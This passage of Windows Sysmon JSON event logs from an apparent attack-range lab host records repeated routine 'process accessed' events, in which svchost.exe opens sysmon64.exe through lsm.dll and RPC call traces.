06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 